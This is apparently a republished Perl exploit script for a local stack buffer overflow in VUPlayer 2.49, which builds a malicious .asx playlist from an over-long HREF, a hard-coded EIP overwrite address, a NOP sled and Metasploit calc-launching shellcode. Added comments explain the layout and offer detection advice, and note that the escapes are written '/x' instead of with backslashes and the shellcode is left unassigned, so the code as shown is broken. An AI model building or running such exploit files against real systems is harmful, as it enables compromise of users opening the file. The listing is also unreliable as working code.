
VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit

2009-01-12 14:02 369 查看
来源:www.vfcocus.net

#!/usr/bin/perl -w

# author : Houssamix

# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit

# Show the author's banner: target application, version, vendor links and
# exploit type. The text is emitted exactly as published, including the
# literal "/n" that ends the last line.
print join(
    "\n",
    '',
    '########################################################################',
    '#~ Author : HouSSamix #',
    '#~ Program : VUPlayer #',
    '#~ Version : 2.49 #',
    '#~ website : http://www.vuplayer.com/ #',
    '#~ Download : http://vuplayer.com/files/vuplayersetup.exe #',
    '#~ Type : (.asx File) local Stack Overflow Exploit #',
    '########################################################################/n',
);
###################################################################
# Payload layout, part 1: the opening of the .asx playlist plus the filler
# that becomes the value of its HREF attribute.
#
# Read as hex escapes, the first values below spell the playlist header
#   <ASX VERSION="3.0">  <ENTRY>  <TITLE>PrO SpY</TITLE>  <REF HREF="
# and everything after that is printable filler inside the HREF value.
# Per the page title, the flaw demonstrated is in the player, which overflows
# a stack buffer while parsing an over-long HREF.
#
# NOTE(review): in this copy every escape is written "/x.." rather than with a
# backslash, so Perl keeps the text literally. The listing is preserved as
# published and does not emit the bytes described in these comments.
#
# Defender notes: a playlist entry whose HREF runs to several kilobytes is not
# a legitimate media reference. Flag or block such .asx files at mail and web
# gateways, remove the affected player version (2.49 per the header) where it
# is not needed, and keep DEP/ASLR enforced on hosts that still run it.
$BOF =
"/x3C/x41/x53/x58/x20/x56/x45/x52/x53/x49/x4F/x4E/x3D/x22/x33/x2E".
"/x30/x22/x3E/x0A/x0D/x0A/x3C/x45/x4E/x54/x52/x59/x3E/x0A/x3C/x54".
"/x49/x54/x4C/x45/x3E/x50/x72/x4F/x20/x53/x70/x59/x3C/x2F/x54/x49".
"/x54/x4C/x45/x3E/x0A/x0D/x0A/x3C/x52/x45/x46/x20/x48/x52/x45/x46".
"/x3D/x22/x6D/x51/x47/x69/x42/x45/x67/x30/x33/x70/x55/x52/x42/x41".
"/x44/x55/x56/x77/x4A/x75/x4B/x53/x51/x2B/x73/x4D/x45/x6C/x34/x78".
"/x43/x5A/x75/x77/x42/x75/x6A/x53/x53/x58/x4A/x69/x30/x62/x46/x6B".
"/x32/x31/x49/x34/x66/x75/x30/x69/x70/x64/x56/x34/x68/x41/x31/x32".
"/x45/x49/x4F/x6D/x34/x69/x41/x34/x30/x70/x48/x39/x72/x50/x69/x43".
"/x48/x6B/x65/x41/x52/x71/x50/x75/x6A/x4F/x71/x6C/x78/x63/x4D/x6E".
"/x52/x51/x68/x39/x62/x43/x32/x2B/x75/x53/x34/x4D/x54/x67/x63/x2B".
"/x46/x38/x52/x33/x62/x62/x51/x56/x65/x61/x57/x36/x6E/x38/x6C/x5A".
"/x2B/x48/x51/x59/x57/x5A/x4D/x77/x57/x41/x72/x30/x31/x4C/x61/x5A".
"/x38/x64/x64/x57/x37/x38/x59/x69/x58/x45/x49/x75/x5A/x47/x71/x72".
"/x62/x37/x69/x6D/x62/x57/x79/x6B/x4B/x70/x45/x68/x52/x34/x41/x71".
"/x73/x78/x6C/x6F/x6D/x73/x5A/x74/x37/x73/x33/x77/x43/x67/x6A/x72".
"/x69/x47/x75/x62/x48/x78/x5A/x79/x37/x70/x75/x63/x6A/x63/x36/x37".
"/x77/x52/x43/x79/x5A/x31/x4A/x66/x6B/x44/x2F/x33/x55/x4D/x53/x48".
"/x2F/x53/x32/x4B/x35/x68/x79/x62/x34/x33/x38/x4E/x32/x4E/x43/x4B".
"/x7A/x79/x74/x61/x79/x4E/x69/x52/x50/x63/x65/x57/x4B/x50/x6D/x4F".
"/x73/x2F/x4D/x51/x6F/x38/x75/x55/x5A/x35/x43/x52/x2B/x35/x54/x34".
"/x55/x51/x59/x75/x2B/x53/x4D/x62/x75/x69/x75/x6D/x31/x78/x78/x48".
"/x64/x47/x62/x54/x33/x5A/x6F/x63/x63/x6E/x61/x4C/x65/x72/x77/x41".
"/x36/x38/x56/x52/x30/x55/x50/x4E/x76/x62/x66/x64/x45/x64/x74/x44".
"/x43/x4F/x4A/x49/x51/x44/x4A/x66/x72/x34/x45/x6F/x56/x77/x6E/x6F".
"/x49/x45/x43/x57/x73/x57/x38/x37/x6F/x59/x41/x61/x36/x72/x4D/x38".
"/x65/x46/x53/x70/x6C/x42/x63/x6F/x4E/x68/x74/x34/x6D/x4E/x74/x54".
"/x35/x74/x6B/x66/x41/x64/x47/x6D/x66/x66/x54/x4F/x52/x73/x4B/x54".
"/x65/x54/x71/x68/x79/x71/x41/x2F/x30/x57/x39/x49/x79/x41/x70/x4A".
"/x34/x6B/x6A/x4C/x53/x4C/x32/x7A/x31/x4B/x4B/x67/x33/x67/x31/x6C".
"/x65/x63/x58/x66/x7A/x6F/x55/x32/x43/x68/x34/x66/x76/x68/x31/x54".
"/x44/x6D/x68/x34/x57/x39/x69/x37/x42/x72/x6B/x38/x70/x61/x2B/x38".
"/x32/x79/x49/x57/x38/x79/x44/x34/x56/x78/x30/x37/x4C/x57/x49/x39".
"/x4D/x32/x5A/x59/x56/x2F/x63/x68/x72/x48/x35/x4D/x66/x56/x4D/x47".
"/x62/x6C/x56/x4D/x73/x32/x53/x61/x51/x63/x47/x41/x6E/x67/x51/x72".
"/x71/x35/x43/x38/x5A/x6B/x31/x68/x79/x65/x44/x70/x36/x54/x75/x46".
"/x56/x39/x55/x47/x4B/x59/x73/x6F/x65/x4C/x6B/x38/x53/x71/x39/x6F".
"/x58/x63/x5A/x4F/x4C/x42/x50/x70/x67/x4B/x31/x6F/x4E/x35/x63/x65".
"/x47/x77/x38/x30/x70/x31/x4B/x4C/x4C/x4D/x33/x57/x47/x73/x55/x6E".
"/x36/x64/x6E/x62/x51/x63/x62/x57/x6C/x73/x64/x7A/x42/x79/x62/x53".
"/x41/x38/x63/x33/x56/x69/x62/x57/x6C/x30/x51/x47/x31/x70/x62/x48".
"/x63/x77/x63/x6D/x30/x75/x59/x32/x39/x74/x50/x6F/x68/x67/x42/x42".
"/x4D/x52/x41/x67/x41/x67/x42/x51/x4A/x49/x4E/x4E/x36/x56/x41/x68".
"/x73/x44/x42/x67/x73/x4A/x43/x41/x63/x44/x41/x67/x51/x56/x41/x67".
"/x67/x44/x42/x42/x59/x43/x41/x77/x45/x43/x48/x67/x45/x43/x46/x34".
"/x41/x41/x43/x67/x6B/x51/x6E/x55/x35/x2B/x76/x33/x57/x47/x38/x6F".
"/x59/x79/x7A/x67/x43/x5A/x41/x57/x74/x55/x68/x4D/x6C/x76/x7A/x78".
"/x35/x43/x6A/x74/x55/x79/x41/x42/x2F/x72/x6D/x69/x4B/x63/x6F/x2F".
"/x41/x41/x6E/x41/x39/x48/x63/x46/x6D/x6C/x39/x37/x36/x65/x5A/x64".
"/x56/x64/x62/x5A/x6F/x75/x35/x44/x6E/x58/x6D/x79/x2F/x47/x75/x51".
"/x51/x4E/x42/x45/x67/x30/x33/x77/x38/x51/x45/x41/x43/x43/x35/x47".
"/x54/x34/x30/x73/x76/x7A/x5A/x59/x4A/x4B/x59/x6D/x39/x64/x51/x46".
"/x6E/x76/x75/x54/x6B/x56/x68/x52/x72/x79/x50/x73/x65/x4A/x76/x33".
"/x58/x6D/x44/x67/x52/x42/x42/x70/x64/x45/x74/x63/x74/x33/x79/x50".
"/x35/x63/x4F/x61/x47/x31/x41/x6E/x62/x56/x32/x6D/x32/x79/x50/x79".
"/x6C/x6C/x6E/x78/x4A/x41/x61/x74/x7A/x52/x6C/x70/x58/x59/x73/x32".
"/x61/x2B/x6C/x32/x37/x41/x64/x32/x65/x46/x6F/x4C/x6C/x45/x68/x31".
"/x39/x38/x6D/x6A/x56/x50/x75/x66/x59/x4C/x62/x6B/x71/x35/x42/x74".
"/x33/x53/x39/x41/x2B/x46/x36/x69/x58/x68/x51/x72/x2B/x4A/x54/x58".
"/x4D/x41/x54/x50/x44/x48/x67/x34/x43/x2F/x39/x71/x66/x79/x52/x62".
"/x63/x55/x68/x70/x35/x57/x61/x61/x4E/x5A/x42/x6D/x51/x49/x31/x32".
"/x34/x6F/x6D/x4E/x5A/x5A/x54/x4C/x56/x4C/x34/x72/x49/x62/x4C/x73".
"/x56/x49/x77/x33/x77/x79/x4C/x31/x5A/x44/x71/x4D/x38/x72/x72/x73".
"/x54/x51/x41/x57/x72/x61/x47/x35/x6A/x79/x73/x37/x5A/x37/x65/x69".
"/x78/x49/x6B/x64/x64/x58/x37/x36/x73/x6D/x6E/x4D/x78/x53/x56/x67".
"/x50/x6A/x63/x77/x5A/x6B/x49/x43/x37/x49/x2F/x2B/x2F/x41/x4C/x61".
"/x4C/x69/x4F/x41/x74/x31";
# Four-byte placeholder. The name suggests it is meant to land in ECX; that
# cannot be verified from this listing.
$ECX = "/x43/x43/x43/x43";
# Despite the name, these values are printable characters, not 0x90 NOP bytes.
$nops = "/x33/x33/x33/x37/x34/x6D/x49/x4D/x4F/x70/x4E/x42";
# Labelled EIP by the author: presumably the value meant to replace the saved
# return address. A hard-coded address like this depends on a fixed module
# layout, which is what ASLR removes -- TODO confirm against the target build.
$EIP = "/x5D/x38/x82/x7C" ; # EIP

# 36 repetitions of the 0x90 (NOP) pattern, placed ahead of the shellcode in
# the final concatenation.
$c = "/x90" x 36 ;

# Payload layout, part 2: the embedded shellcode, trailing filler and the
# closing playlist markup.
#
# Per the generator comment below, the shellcode is a Metasploit win32_exec
# payload that runs "calc" (a proof-of-execution only), 343 bytes, produced
# with the PexAlphaNum encoder.
#
# NOTE(review): in this copy the declaration `my $shellcode =` sits at the end
# of the comment line, so the string literal that follows is not assigned to
# any variable. The listing is kept as published.
# u can change this shellcode but dont forget to use Encoder=PexAlphaNum

# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49".
"/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36".
"/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34".
"/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41".
"/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x44".
"/x42/x30/x42/x50/x42/x30/x4b/x58/x45/x34/x4e/x43/x4b/x48/x4e/x37".
"/x45/x30/x4a/x57/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x58".
"/x4f/x55/x42/x42/x41/x50/x4b/x4e/x49/x34/x4b/x58/x46/x53/x4b/x38".
"/x41/x30/x50/x4e/x41/x53/x42/x4c/x49/x49/x4e/x4a/x46/x58/x42/x4c".
"/x46/x57/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e".
"/x46/x4f/x4b/x33/x46/x35/x46/x52/x46/x30/x45/x37/x45/x4e/x4b/x58".
"/x4f/x35/x46/x32/x41/x50/x4b/x4e/x48/x36/x4b/x48/x4e/x50/x4b/x54".
"/x4b/x38/x4f/x45/x4e/x31/x41/x50/x4b/x4e/x4b/x48/x4e/x51/x4b/x38".
"/x41/x50/x4b/x4e/x49/x48/x4e/x55/x46/x32/x46/x50/x43/x4c/x41/x43".
"/x42/x4c/x46/x56/x4b/x48/x42/x34/x42/x53/x45/x58/x42/x4c/x4a/x57".
"/x4e/x30/x4b/x48/x42/x44/x4e/x30/x4b/x58/x42/x57/x4e/x51/x4d/x4a".
"/x4b/x38/x4a/x46/x4a/x50/x4b/x4e/x49/x50/x4b/x58/x42/x58/x42/x4b".
"/x42/x30/x42/x30/x42/x30/x4b/x58/x4a/x46/x4e/x43/x4f/x45/x41/x43".
"/x48/x4f/x42/x46/x48/x35/x49/x58/x4a/x4f/x43/x38/x42/x4c/x4b/x47".
"/x42/x35/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x35/x4a/x36/x4a/x39".
"/x50/x4f/x4c/x38/x50/x50/x47/x35/x4f/x4f/x47/x4e/x43/x36/x41/x36".
"/x4e/x56/x43/x36/x42/x50/x5a";

# 7687 repetitions of the 0x90 pattern appended after the payload as trailing
# filler; this is what makes the HREF value several kilobytes long.
$cc = "/x90" x 7687 ;

# Read as hex escapes this spells `.asf"/>`, `</ENTRY>` and `</ASX>`: it closes
# the HREF attribute and the playlist so the file still parses as ASX.
$asx = "/x2E/x61/x73/x66/x22/x2F/x3E/x0A/x3C/x2F/x45/x4E/x54/x52/x59/x3E".
"/x0A/x3C/x2F/x41/x53/x58/x3E/x0A";

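# Concatenate the pieces in the author's order, write them to the output
# file, and only then print the closing message.
#
# Defender note: the default output name below is a weak indicator at best;
# detection should key on the over-long HREF value in the .asx entry instead.
$file = "houssamix.asx";
$exp  = $BOF.$ECX.$nops.$EIP.$c.$shellcode.$cc.$asx;

# Three-argument open with a lexical handle: the mode can never be taken from
# the file name. Each step is checked so the script stops on an I/O failure
# instead of announcing a file that was never written.
open(my $out, '>', $file) or die "cannot open $file for writing: $!\n";
print {$out} $exp or die "cannot write $file: $!\n";
close($out) or die "cannot close $file: $!\n";

print "
################################
File exploit created open it with vuplayer
################################
Exploit by Houssamix
/n/n";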